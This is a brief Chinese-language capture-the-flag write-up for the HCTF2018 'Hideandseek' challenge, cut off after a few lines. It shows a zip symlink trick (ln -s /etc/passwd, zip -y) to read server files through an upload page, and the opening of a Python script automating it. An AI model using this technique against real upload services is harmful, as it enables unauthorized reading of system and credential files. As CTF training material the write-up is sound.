[HCTF2018]Hideandseek
# [HCTF2018]Hideandseek
登陆进去是一个文件上传的页面,但是是上传 zip 文件,上传文件之后好像会解析内容,进行文件读取,可以想一下 zip 软链接,用 /etc/passwd 试一下
ln -s /etc/passwd 321
zip -y 111.zip 321
上传生成的 zip 文件得到回显
进行部分修改后:
import osimport requestsimport sysdef make_zip(): os.system('ln -s ' + sys.argv[2] + ' test_exp')...
more...